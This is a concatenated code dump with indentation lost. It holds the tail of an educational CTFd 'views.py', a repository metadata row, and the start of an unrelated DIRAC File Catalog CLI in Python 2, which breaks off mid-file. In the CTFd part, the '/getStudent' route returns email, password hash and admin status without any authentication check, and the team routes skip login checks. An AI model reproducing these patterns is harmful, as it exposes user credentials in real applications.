<br>
Modified for educational use by <a href="https://github.com/camgeehr">Cameron Geehr</a>, <a href="https://github.com/jaboyles">Jacob Boyles</a>, and <a href="https://github.com/bgoulds">Brian Gouldsberry</a>
</h3>
</div>""".format(request.script_root))
# max attempts per challenge
max_tries = set_config("max_tries", 0)
# Start time
start = set_config('start', None)
end = set_config('end', None)
# Challenges cannot be viewed by unregistered users
view_challenges_unregistered = set_config('view_challenges_unregistered', None)
# Allow/Disallow registration
prevent_registration = set_config('prevent_registration', None)
# Verify emails
verify_emails = set_config('verify_emails', None)
mail_server = set_config('mail_server', None)
mail_port = set_config('mail_port', None)
mail_tls = set_config('mail_tls', None)
mail_ssl = set_config('mail_ssl', None)
mail_username = set_config('mail_username', None)
mail_password = set_config('mail_password', None)
setup = set_config('setup', True)
db.session.add(page)
db.session.add(admin)
db.session.commit()
db.session.close()
app.setup = False
with app.app_context():
cache.clear()
return redirect(url_for('views.static_html'))
return render_template('setup.html', nonce=session.get('nonce'), setup=True)
return redirect(url_for('views.static_html'))
# Custom CSS handler
@views.route('/static/user.css')
def custom_css():
return Response(get_config("css"), mimetype='text/css')
# Static HTML files
@views.route("/", defaults={'template': 'index'})
@views.route("/<template>")
def static_html(template):
try:
return render_template('%s.html' % template)
except TemplateNotFound:
page = Pages.query.filter_by(route=template).first_or_404()
return render_template('page.html', content=page.html)
@views.route('/students', defaults={'page': '1'})
@views.route('/students/<int:page>')
def students(page):
page = abs(int(page))
results_per_page = 50
page_start = results_per_page * (page - 1)
page_end = results_per_page * (page - 1) + results_per_page
if get_config('verify_emails'):
count = Students.query.filter_by(verified=True, banned=False).count()
students = Students.query.filter_by(verified=True, banned=False).slice(page_start, page_end).all()
else:
count = Students.query.filter_by(banned=False).count()
students = Students.query.filter_by(banned=False).slice(page_start, page_end).all()
pages = int(count / results_per_page) + (count % results_per_page > 0)
return render_template('students.html', students=students, student_pages=pages, curr_page=page)
@views.route('/student/<int:studentid>', methods=['GET', 'POST'])
def student(studentid):
if get_config('view_scoreboard_if_authed') and not authed():
return redirect(url_for('auth.login', next=request.path))
if not is_admin() and session['id'] != studentid:
return render_template('errors/403.html')
user = Students.query.filter_by(id=studentid).first_or_404()
solves = Solves.query.filter_by(studentid=studentid)
awards = Awards.query.filter_by(studentid=studentid).all()
score = user.score()
place = user.place()
db.session.close()
if request.method == 'GET':
return render_template('student.html', solves=solves, awards=awards, student=user, score=score, place=place)
elif request.method == 'POST':
json = {'solves': []}
for x in solves:
json['solves'].append({'id': x.id, 'chal': x.chalid, 'student': x.studentid})
return jsonify(json)
@views.route('/getStudent/<int:studentid>', methods=['GET'])
def getStudent(studentid):
student = Students.query.filter_by(studentid=studentid).first()
json_data = {
'id' : student.id,
'name' : student.name,
'email' : student.email,
'teamid' : student.teamid,
'password' : student.password,
'bracket' : student.bracket,
'banned' : student.banned,
'verified' : student.verified,
'admin' : student.admin,
'joined' : student.joined,
'sectionid' : student.sectionid
}
db.session.close()
return jsonify(json_data)
@views.route('/profile', methods=['POST', 'GET'])
def profile():
if authed():
if request.method == "POST":
errors = []
name = request.form.get('name')
email = request.form.get('email')
user = Students.query.filter_by(id=session['id']).first()
if not get_config('prevent_name_change'):
names = Students.query.filter_by(name=name).first()
name_len = len(request.form['name']) == 0
emails = Students.query.filter_by(email=email).first()
valid_email = re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email)
if ('password' in request.form.keys() and not len(request.form['password']) == 0) and \
(not bcrypt_sha256.verify(request.form.get('confirm').strip(), user.password)):
errors.append("Your old password doesn't match what we have.")
if not valid_email:
errors.append("That email doesn't look right")
if not get_config('prevent_name_change') and names and name != session['username']:
errors.append('That student name is already taken')
if emails and emails.id != session['id']:
errors.append('That email has already been used')
if not get_config('prevent_name_change') and name_len:
errors.append('Pick a longer student name')
if len(errors) > 0:
return render_template('profile.html', name=name, email=email, errors=errors)
else:
student = Students.query.filter_by(id=session['id']).first()
if not get_config('prevent_name_change'):
student.name = name
if student.email != email.lower():
student.email = email.lower()
if get_config('verify_emails'):
student.verified = False
session['username'] = student.name
if 'password' in request.form.keys() and not len(request.form['password']) == 0:
student.password = bcrypt_sha256.encrypt(request.form.get('password'))
db.session.commit()
db.session.close()
return redirect(url_for('views.profile'))
else:
user = Students.query.filter_by(id=session['id']).first()
name = user.name
email = user.email
prevent_name_change = get_config('prevent_name_change')
confirm_email = get_config('verify_emails') and not user.verified
return render_template('profile.html', name=name, email=email, prevent_name_change=prevent_name_change,
confirm_email=confirm_email)
else:
return redirect(url_for('auth.login'))
@views.route('/files', defaults={'path': ''})
@views.route('/files/<path:path>')
def file_handler(path):
f = Files.query.filter_by(location=path).first_or_404()
if f.chal:
if not is_admin():
if not ctftime():
if view_after_ctf() and ctf_started():
pass
else:
abort(403)
return send_file(os.path.join(app.root_path, 'uploads', f.location))
@views.route('/teams', defaults={'page': '1'})
@views.route('/teams/<int:page>')
def teams(page):
if get_config('view_scoreboard_if_authed') or not authed():
return redirect(url_for('auth.login', next=request.path))
studentid = session['id']
page = abs(int(page))
results_per_page = 50
page_start = results_per_page * (page - 1)
page_end = results_per_page * (page - 1) + results_per_page
student = Students.query.filter_by(id=studentid).first()
count = Teams.query.filter_by().count()
teams = Teams.query.filter_by(sectionNumber=student.sectionid).slice(page_start, page_end).all()
pages = int(count / results_per_page) + (count % results_per_page > 0)
return render_template('teams.html', teams=teams, team_pages=pages, curr_page=page)
@views.route('/team/<int:teamid>')
def team(teamid):
if get_config('view_scoreboard_if_authed') and not authed():
return redirect(url_for('auth.login', next=request.path))
team = Teams.query.filter_by(id=teamid).first()
student = Students.query.filter_by(id = session['id']).first()
if student.sectionid != team.sectionNumber:
return render_template('errors/403.html')
students = Students.query.filter_by(teamid=teamid)
# get solves data by team id
# get awards data by team id
challenges = Challenges.query.all()
db.session.close()
if request.method == 'GET':
return render_template('team.html', team=team, students=students, challenges=challenges)
elif request.method == 'POST':
return None # return solves data by team id
@views.route('/team/<int:teamid>/challenges')
def teamChallenges(teamid):
team = Teams.query.filter_by(id=teamid).first()
challenges = team.challenges()
return render_template('tChallenges.html', team=team, challenges=challenges)
@views.route('/team/<int:teamid>/solves')
def teamSolves(teamid):
team = Teams.query.filter_by(id=teamid).first()
solves = team.solves()
return render_template('tSolves.html', team=team, solves=solves)
|
jaboyles/CFTD_Senior_Project
|
CTFd/views.py
|
Python
|
apache-2.0
| 12,054
|
[
"Brian"
] |
f911a8e1046ed35399aab23c6c39c306a23ddf30a41b453a18107cda2c8b85da
|
#!/usr/bin/env python
""" File Catalog Client Command Line Interface. """
__RCSID__ = "$Id$"
import stat
import cmd
import commands
import os.path
import time
import sys
from types import DictType, ListType
from DIRAC import gConfig
from DIRAC.Core.Security import CS
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
from DIRAC.Core.Utilities.List import uniqueElements
from DIRAC.Interfaces.API.Dirac import Dirac
from DIRAC.Core.Utilities.PrettyPrint import int_with_commas, printTable
from DIRAC.DataManagementSystem.Client.CmdDirCompletion.AbstractFileSystem import DFCFileSystem, UnixLikeFileSystem
from DIRAC.DataManagementSystem.Client.CmdDirCompletion.DirectoryCompletion import DirectoryCompletion
class DirectoryListing:
def __init__(self):
self.entries = []
def addFile(self,name,fileDict,repDict,numericid):
""" Pretty print of the file ls output
"""
perm = fileDict['Mode']
date = fileDict['ModificationDate']
#nlinks = fileDict.get('NumberOfLinks',0)
nreplicas = len( repDict )
size = fileDict['Size']
if fileDict.has_key('Owner'):
uname = fileDict['Owner']
elif fileDict.has_key('OwnerDN'):
result = CS.getUsernameForDN(fileDict['OwnerDN'])
if result['OK']:
uname = result['Value']
else:
uname = 'unknown'
else:
uname = 'unknown'
if numericid:
uname = str(fileDict['UID'])
if fileDict.has_key('OwnerGroup'):
gname = fileDict['OwnerGroup']
elif fileDict.has_key('OwnerRole'):
groups = CS.getGroupsWithVOMSAttribute('/'+fileDict['OwnerRole'])
if groups:
if len(groups) > 1:
gname = groups[0]
default_group = gConfig.getValue('/Registry/DefaultGroup','unknown')
if default_group in groups:
gname = default_group
else:
gname = groups[0]
else:
gname = 'unknown'
else:
gname = 'unknown'
if numericid:
gname = str(fileDict['GID'])
self.entries.append( ('-'+self.__getModeString(perm),nreplicas,uname,gname,size,date,name) )
def addDirectory(self,name,dirDict,numericid):
""" Pretty print of the file ls output
"""
perm = dirDict['Mode']
date = dirDict['ModificationDate']
nlinks = 0
size = 0
if dirDict.has_key('Owner'):
uname = dirDict['Owner']
elif dirDict.has_key('OwnerDN'):
result = CS.getUsernameForDN(dirDict['OwnerDN'])
if result['OK']:
uname = result['Value']
else:
uname = 'unknown'
else:
uname = 'unknown'
if numericid:
uname = str(dirDict['UID'])
if dirDict.has_key('OwnerGroup'):
gname = dirDict['OwnerGroup']
elif dirDict.has_key('OwnerRole'):
groups = CS.getGroupsWithVOMSAttribute('/'+dirDict['OwnerRole'])
if groups:
if len(groups) > 1:
gname = groups[0]
default_group = gConfig.getValue('/Registry/DefaultGroup','unknown')
if default_group in groups:
gname = default_group
else:
gname = groups[0]
else:
gname = 'unknown'
if numericid:
gname = str(dirDict['GID'])
self.entries.append( ('d'+self.__getModeString(perm),nlinks,uname,gname,size,date,name) )
def addDataset(self,name,datasetDict,numericid):
""" Pretty print of the dataset ls output
"""
perm = datasetDict['Mode']
date = datasetDict['ModificationDate']
size = datasetDict['TotalSize']
if datasetDict.has_key('Owner'):
uname = datasetDict['Owner']
elif datasetDict.has_key('OwnerDN'):
result = CS.getUsernameForDN(datasetDict['OwnerDN'])
if result['OK']:
uname = result['Value']
else:
uname = 'unknown'
else:
uname = 'unknown'
if numericid:
uname = str( datasetDict['UID'] )
gname = 'unknown'
if datasetDict.has_key('OwnerGroup'):
gname = datasetDict['OwnerGroup']
if numericid:
gname = str( datasetDict ['GID'] )
numberOfFiles = datasetDict ['NumberOfFiles']
self.entries.append( ('s'+self.__getModeString(perm),numberOfFiles,uname,gname,size,date,name) )
def __getModeString(self,perm):
""" Get string representation of the file/directory mode
"""
pstring = ''
if perm & stat.S_IRUSR:
pstring += 'r'
else:
pstring += '-'
if perm & stat.S_IWUSR:
pstring += 'w'
else:
pstring += '-'
if perm & stat.S_IXUSR:
pstring += 'x'
else:
pstring += '-'
if perm & stat.S_IRGRP:
pstring += 'r'
else:
pstring += '-'
if perm & stat.S_IWGRP:
pstring += 'w'
else:
pstring += '-'
if perm & stat.S_IXGRP:
pstring += 'x'
else:
pstring += '-'
if perm & stat.S_IROTH:
pstring += 'r'
else:
pstring += '-'
if perm & stat.S_IWOTH:
pstring += 'w'
else:
pstring += '-'
if perm & stat.S_IXOTH:
pstring += 'x'
else:
pstring += '-'
return pstring
def printListing(self,reverse,timeorder):
"""
"""
if timeorder:
if reverse:
self.entries.sort(key=lambda x: x[5])
else:
self.entries.sort(key=lambda x: x[5],reverse=True)
else:
if reverse:
self.entries.sort(key=lambda x: x[6],reverse=True)
else:
self.entries.sort(key=lambda x: x[6])
# Determine the field widths
wList = [0] * 7
for d in self.entries:
for i in range(7):
if len(str(d[i])) > wList[i]:
wList[i] = len(str(d[i]))
for e in self.entries:
print str(e[0]),
print str(e[1]).rjust(wList[1]),
print str(e[2]).ljust(wList[2]),
print str(e[3]).ljust(wList[3]),
print str(e[4]).rjust(wList[4]),
print str(e[5]).rjust(wList[5]),
print str(e[6])
def addSimpleFile(self,name):
""" Add single files to be sorted later"""
self.entries.append(name)
def printOrdered(self):
""" print the ordered list"""
self.entries.sort()
for entry in self.entries:
print entry
class FileCatalogClientCLI(cmd.Cmd):
""" usage: FileCatalogClientCLI.py xmlrpc-url.
The URL should use HTTP protocol, and specify a port. e.g.::
http://localhost:7777
This provides a command line interface to the FileCatalog Exported API::
ls(path) - lists the directory path
The command line interface to these functions can be listed by typing "help"
at the prompt.
Other modules which want access to the FileCatalog API should simply make
their own internal connection to the XMLRPC server using code like::
server = xmlrpclib.Server(xmlrpc_url)
server.exported_function(args)
"""
intro = """
File Catalog Client $Revision: 1.17 $Date:
"""
def __init__(self, client):
cmd.Cmd.__init__(self)
self.fc = client
self.cwd = '/'
self.prompt = 'FC:'+self.cwd+'> '
self.previous_cwd = '/'
self.dfc_fs = DFCFileSystem(self.fc)
self.lfn_dc = DirectoryCompletion(self.dfc_fs)
self.ul_fs = UnixLikeFileSystem()
self.ul_dc = DirectoryCompletion(self.ul_fs)
def getPath(self,apath):
if apath.find('/') == 0:
path = apath
else:
path = self.cwd+'/'+apath
path = path.replace('//','/')
return os.path.normpath(path)
def do_register(self,args):
""" Register a record to the File Catalog
usage:
register file <lfn> <pfn> <size> <SE> [<guid>] - register new file record in the catalog
register replica <lfn> <pfn> <SE> - register new replica in the catalog
"""
argss = args.split()
if (len(argss)==0):
print self.do_register.__doc__
return
option = argss[0]
del argss[0]
if option == 'file':
if (len(argss) < 4):
print self.do_register.__doc__
return
return self.registerFile(argss)
elif option == 'pfn' or option == "replica":
# TODO
# Is the __doc__ not complete ?
if (len(argss) != 3):
print self.do_register.__doc__
return
return self.registerReplica(argss)
else:
print "Unknown option:",option
# An Auto Completion For ``register``
_available_register_cmd = ['file', 'replica']
def complete_register(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) >= 2 and (args[1] in self._available_register_cmd):
# if 'register file' or 'register replica' exists,
# try to do LFN auto completion.
cur_path = ""
if (len(args) == 3):
cur_path = args[2]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
result = [i for i in self._available_register_cmd if i.startswith(text)]
return result
def do_add(self,args):
""" Upload a new file to a SE and register in the File Catalog
usage:
add <lfn> <pfn> <SE> [<guid>]
"""
# ToDo - adding directories
argss = args.split()
if len(argss) < 3:
print "Error: insufficient number of arguments"
return
lfn = argss[0]
lfn = self.getPath(lfn)
pfn = argss[1]
se = argss[2]
guid = None
if len(argss)>3:
guid = argss[3]
dirac = Dirac()
result = dirac.addFile(lfn,pfn,se,guid,printOutput=False)
if not result['OK']:
print 'Error: %s' %(result['Message'])
else:
print "File %s successfully uploaded to the %s SE" % (lfn,se)
def complete_add(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_get(self,args):
""" Download file from grid and store in a local directory
usage:
get <lfn> [<local_directory>]
"""
argss = args.split()
if (len(argss)==0):
print self.do_get.__doc__
return
lfn = argss[0]
lfn = self.getPath(lfn)
dir_ = ''
if len(argss)>1:
dir_ = argss[1]
dirac = Dirac()
localCWD = ''
if dir_:
localCWD = os.getcwd()
os.chdir(dir_)
result = dirac.getFile(lfn)
if localCWD:
os.chdir(localCWD)
if not result['OK']:
print 'Error: %s' %(result['Message'])
else:
print "File %s successfully downloaded" % lfn
def complete_get(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_unregister(self,args):
""" Unregister records in the File Catalog
usage:
unregister replica <lfn> <se>
unregister file <lfn>
unregister dir <path>
"""
argss = args.split()
if (len(argss)==0):
print self.do_unregister.__doc__
return
option = argss[0]
del argss[0]
if option == 'replica':
if (len(argss) != 2):
print self.do_unregister.__doc__
return
return self.removeReplica(argss)
elif option == 'file':
if (len(argss) != 1):
print self.do_unregister.__doc__
return
return self.removeFile(argss)
elif option == "dir" or option == "directory":
if (len(argss) != 1):
print self.do_unregister.__doc__
return
return self.removeDirectory(argss)
else:
print "Error: illegal option %s" % option
# An Auto Completion For ``register``
_available_unregister_cmd = ['replica', 'file', 'dir', 'directory']
def complete_unregister(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) >= 2 and (args[1] in self._available_unregister_cmd):
# if 'unregister file' or 'unregister replica' and so on exists,
# try to do LFN auto completion.
cur_path = ""
if (len(args) == 3):
cur_path = args[2]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
result = [i for i in self._available_unregister_cmd if i.startswith(text)]
return result
def do_rmreplica(self,args):
""" Remove LFN replica from the storage and from the File Catalog
usage:
rmreplica <lfn> <se>
"""
argss = args.split()
if (len(argss) != 2):
print self.do_rmreplica.__doc__
return
lfn = argss[0]
lfn = self.getPath(lfn)
print "lfn:",lfn
se = argss[1]
try:
result = self.fc.setReplicaStatus( {lfn:{'SE':se,'Status':'Trash'}} )
if result['OK']:
print "Replica at",se,"moved to Trash Bin"
else:
print "Failed to remove replica at",se
print result['Message']
except Exception, x:
print "Error: rmreplica failed with exception: ", x
def complete_rmreplica(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_rm(self,args):
""" Remove file from the storage and from the File Catalog
usage:
rm <lfn>
NB: this method is not fully implemented !
"""
# Not yet really implemented
argss = args.split()
if len(argss) != 1:
print self.do_rm.__doc__
return
self.removeFile(argss)
def complete_rm(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_rmdir(self,args):
""" Remove directory from the storage and from the File Catalog
usage:
rmdir <path>
NB: this method is not fully implemented !
"""
# Not yet really implemented yet
argss = args.split()
if len(argss) != 1:
print self.do_rmdir.__doc__
return
self.removeDirectory(argss)
def complete_rmdir(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def removeReplica(self,args):
""" Remove replica from the catalog
"""
path = args[0]
lfn = self.getPath(path)
print "lfn:",lfn
rmse = args[1]
try:
result = self.fc.removeReplica( {lfn:{'SE':rmse}} )
if result['OK']:
if 'Failed' in result['Value']:
if lfn in result['Value']['Failed']:
print "ERROR: %s" % ( result['Value']['Failed'][lfn])
elif lfn in result['Value']['Successful']:
print "File %s at %s removed from the catalog" %( lfn, rmse )
else:
"ERROR: Unexpected returned value %s" % result['Value']
else:
print "File %s at %s removed from the catalog" %( lfn, rmse )
else:
print "Failed to remove replica at",rmse
print result['Message']
except Exception, x:
print "Error: rmpfn failed with exception: ", x
def removeFile(self,args):
""" Remove file from the catalog
"""
path = args[0]
lfn = self.getPath(path)
print "lfn:",lfn
try:
result = self.fc.removeFile(lfn)
if result['OK']:
if 'Failed' in result['Value']:
if lfn in result['Value']['Failed']:
print "ERROR: %s" % ( result['Value']['Failed'][lfn] )
elif lfn in result['Value']['Successful']:
print "File",lfn,"removed from the catalog"
else:
print "ERROR: Unexpected result %s" % result['Value']
else:
print "File",lfn,"removed from the catalog"
else:
print "Failed to remove file from the catalog"
print result['Message']
except Exception, x:
print "Error: rm failed with exception: ", x
def removeDirectory(self,args):
""" Remove file from the catalog
"""
path = args[0]
lfn = self.getPath(path)
print "lfn:",lfn
try:
result = self.fc.removeDirectory(lfn)
if result['OK']:
if result['Value']['Successful']:
print "Directory",lfn,"removed from the catalog"
elif result['Value']['Failed']:
print "ERROR:", result['Value']['Failed'][lfn]
else:
print "Failed to remove directory from the catalog"
print result['Message']
except Exception, x:
print "Error: rm failed with exception: ", x
def do_replicate(self,args):
""" Replicate a given file to a given SE
usage:
replicate <LFN> <SE> [<SourceSE>]
"""
argss = args.split()
if len(argss) < 2:
print "Error: unsufficient number of arguments"
return
lfn = argss[0]
lfn = self.getPath(lfn)
se = argss[1]
sourceSE = ''
if len(argss)>2:
sourceSE=argss[2]
try:
dirac = Dirac()
result = dirac.replicateFile(lfn,se,sourceSE,printOutput=True)
if not result['OK']:
print 'Error: %s' %(result['Message'])
elif not result['Value']:
print "Replica is already present at the target SE"
else:
print "File %s successfully replicated to the %s SE" % (lfn,se)
except Exception, x:
print "Error: replicate failed with exception: ", x
def complete_replicate(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_replicas(self,args):
""" Get replicas for the given file specified by its LFN
usage: replicas <lfn>
"""
argss = args.split()
if (len(argss) == 0):
print self.do_replicas.__doc__
return
apath = argss[0]
path = self.getPath(apath)
print "lfn:",path
try:
result = self.fc.getReplicas(path)
if result['OK']:
if result['Value']['Successful']:
for se,entry in result['Value']['Successful'][path].items():
print se.ljust(15),entry
else:
print "Replicas: ",result['Message']
except Exception, x:
print "replicas failed: ", x
def complete_replicas(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def registerFile(self,args):
""" Add a file to the catatlog
usage: add <lfn> <pfn> <size> <SE> [<guid>]
"""
path = args[0]
infoDict = {}
lfn = self.getPath(path)
infoDict['PFN'] = args[1]
infoDict['Size'] = int(args[2])
infoDict['SE'] = args[3]
if len(args) == 5:
guid = args[4]
else:
_status,guid = commands.getstatusoutput('uuidgen')
infoDict['GUID'] = guid
infoDict['Checksum'] = ''
fileDict = {}
fileDict[lfn] = infoDict
try:
result = self.fc.addFile(fileDict)
if not result['OK']:
print "Failed to add file to the catalog: ",
print result['Message']
elif result['Value']['Failed']:
if result['Value']['Failed'].has_key(lfn):
print 'Failed to add file:',result['Value']['Failed'][lfn]
elif result['Value']['Successful']:
if result['Value']['Successful'].has_key(lfn):
print "File successfully added to the catalog"
except Exception, x:
print "add file failed: ", str(x)
def registerReplica(self,args):
""" Add a file to the catatlog
usage: addpfn <lfn> <pfn> <SE>
"""
path = args[0]
infoDict = {}
lfn = self.getPath(path)
infoDict['PFN'] = args[1]
if infoDict['PFN'] == "''" or infoDict['PFN'] == '""':
infoDict['PFN'] = ''
infoDict['SE'] = args[2]
repDict = {}
repDict[lfn] = infoDict
try:
result = self.fc.addReplica(repDict)
if not result['OK']:
print "Failed to add replica to the catalog: ",
print result['Message']
elif result['Value']['Failed']:
print 'Failed to add replica:',result['Value']['Failed'][lfn]
else:
print "Replica added successfully:", result['Value']['Successful'][lfn]
except Exception, x:
print "add pfn failed: ", str(x)
def do_ancestorset(self,args):
""" Set ancestors for the given file
usage: ancestorset <lfn> <ancestor_lfn> [<ancestor_lfn>...]
"""
argss = args.split()
if (len(argss) == 0):
print self.do_ancestorset.__doc__
return
lfn = argss[0]
if lfn[0] != '/':
lfn = self.cwd + '/' + lfn
ancestors = argss[1:]
tmpList = []
for a in ancestors:
if a[0] != '/':
a = self.cwd + '/' + a
tmpList.append(a)
ancestors = tmpList
try:
result = self.fc.addFileAncestors({lfn:{'Ancestors':ancestors}})
if not result['OK']:
print "Failed to add file ancestors to the catalog: ",
print result['Message']
elif result['Value']['Failed']:
print "Failed to add file ancestors to the catalog: ",
print result['Value']['Failed'][lfn]
else:
print "Added %d ancestors to file %s" % (len(ancestors),lfn)
except Exception, x:
print "Exception while adding ancestors: ", str(x)
def complete_ancestorset(self, text, line, begidx, endidx):
args = line.split()
if ( len(args) == 1 ):
cur_path = ""
elif ( len(args) > 1 ):
# If the line ends with ' '
# this means a new parameter begin.
if line.endswith(' '):
cur_path = ""
else:
cur_path = args[-1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_ancestor(self,args):
""" Get ancestors of the given file
usage: ancestor <lfn> [depth]
"""
argss = args.split()
if (len(argss) == 0):
print self.do_ancestor.__doc__
return
lfn = argss[0]
if lfn[0] != '/':
lfn = self.cwd + '/' + lfn
depth = [1]
if len(argss) > 1:
depth = int(argss[1])
depth = range(1,depth+1)
try:
result = self.fc.getFileAncestors([lfn],depth)
if not result['OK']:
print "ERROR: Failed to get ancestors: ",
print result['Message']
elif result['Value']['Failed']:
print "Failed to get ancestors: ",
print result['Value']['Failed'][lfn]
else:
depthDict = {}
depSet = set()
for lfn,ancestorDict in result['Value']['Successful'].items():
for ancestor,dep in ancestorDict.items():
depthDict.setdefault(dep,[])
depthDict[dep].append(ancestor)
depSet.add(dep)
depList = list(depSet)
depList.sort()
print lfn
for dep in depList:
for lfn in depthDict[dep]:
print dep,' '*dep*5, lfn
except Exception, x:
print "Exception while getting ancestors: ", str(x)
def complete_ancestor(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
def do_descendent(self,args):
""" Get descendents of the given file
usage: descendent <lfn> [depth]
"""
argss = args.split()
if (len(argss) == 0):
print self.do_descendent.__doc__
return
lfn = argss[0]
if lfn[0] != '/':
lfn = self.cwd + '/' + lfn
depth = [1]
if len(argss) > 1:
depth = int(argss[1])
depth = range(1,depth+1)
try:
result = self.fc.getFileDescendents([lfn],depth)
if not result['OK']:
print "ERROR: Failed to get descendents: ",
print result['Message']
elif result['Value']['Failed']:
print "Failed to get descendents: ",
print result['Value']['Failed'][lfn]
else:
depthDict = {}
depSet = set()
for lfn,descDict in result['Value']['Successful'].items():
for desc,dep in descDict.items():
depthDict.setdefault(dep,[])
depthDict[dep].append(desc)
depSet.add(dep)
depList = list(depSet)
depList.sort()
print lfn
for dep in depList:
for lfn in depthDict[dep]:
print dep,' '*dep*5, lfn
except Exception, x:
print "Exception while getting descendents: ", str(x)
def complete_descendent(self, text, line, begidx, endidx):
result = []
args = line.split()
# the first argument -- LFN.
if (1<=len(args)<=2):
# If last char is ' ',
# this can be a new parameter.
if (len(args) == 1) or (len(args)==2 and (not line.endswith(' '))):
cur_path = ""
if (len(args) == 2):
cur_path = args[1]
result = self.lfn_dc.parse_text_line(text, cur_path, self.cwd)
return result
#######################################################################################
# User and group methods
def do_user(self,args):
""" User related commands
usage:
user add <username> - register new user in the catalog
user delete <username> - delete user from the catalog
user show - show all users registered in the catalog
"""
argss = args.split()
if (len(argss)==0):
print self.do_user.__doc__
return
option = argss[0]
del argss[0]
if option == 'add':
if (len(argss)!=1):
print self.do_user.__doc__
return
return self.registerUser(argss)
elif option == 'delete':
if (len(argss)!=1):
print self.do_user.__doc__
return
return self.deleteUser(argss)
elif option == "show":
result = self.fc.getUsers()
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
if not result['Value']:
print "No entries found"
else:
for user,id_ in result['Value'].items():
print user.rjust(20),':',id_
else:
print "Unknown option:",option
# completion for ``user``
_available_user_cmd = ['add', 'delete', 'show']
def complete_user(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) == 2 and (args[1] in self._available_user_cmd):
# if the sub command exists,
# Don't need any auto completion
return result
result = [i for i in self._available_user_cmd if i.startswith(text)]
return result
def do_group(self,args):
""" Group related commands
usage:
group add <groupname> - register new group in the catalog
group delete <groupname> - delete group from the catalog
group show - how all groups registered in the catalog
"""
argss = args.split()
if (len(argss)==0):
print self.do_group.__doc__
return
option = argss[0]
del argss[0]
if option == 'add':
if (len(argss)!=1):
print self.do_group.__doc__
return
return self.registerGroup(argss)
elif option == 'delete':
if (len(argss)!=1):
print self.do_group.__doc__
return
return self.deleteGroup(argss)
elif option == "show":
result = self.fc.getGroups()
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
if not result['Value']:
print "No entries found"
else:
for user,id_ in result['Value'].items():
print user.rjust(20),':',id_
else:
print "Unknown option:",option
# completion for ``group``
_available_group_cmd = ['add', 'delete', 'show']
def complete_group(self, text, line, begidx, endidx):
result = []
args = line.split()
if len(args) == 2 and (args[1] in self._available_group_cmd):
# if the sub command exists,
# Don't need any auto completion
return result
result = [i for i in self._available_group_cmd if i.startswith(text)]
return result
def registerUser(self,argss):
""" Add new user to the File Catalog
usage: adduser <user_name>
"""
username = argss[0]
result = self.fc.addUser(username)
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
print "User ID:",result['Value']
def deleteUser(self,args):
""" Delete user from the File Catalog
usage: deleteuser <user_name>
"""
username = args[0]
result = self.fc.deleteUser(username)
if not result['OK']:
print ("Error: %s" % result['Message'])
def registerGroup(self,argss):
""" Add new group to the File Catalog
usage: addgroup <group_name>
"""
gname = argss[0]
result = self.fc.addGroup(gname)
if not result['OK']:
print ("Error: %s" % result['Message'])
else:
print "Group ID:",result['Value']
def deleteGroup(self,args):
""" Delete group from the File Catalog
usage: deletegroup <group_name>
"""
gname = args[0]
result = self.fc.deleteGroup(gname)
if not result['OK']:
print ("Error: %s" % result['Message'])
def do_mkdir(self,args):
""" Make directory
usage: mkdir <path>
"""
argss = args.split()
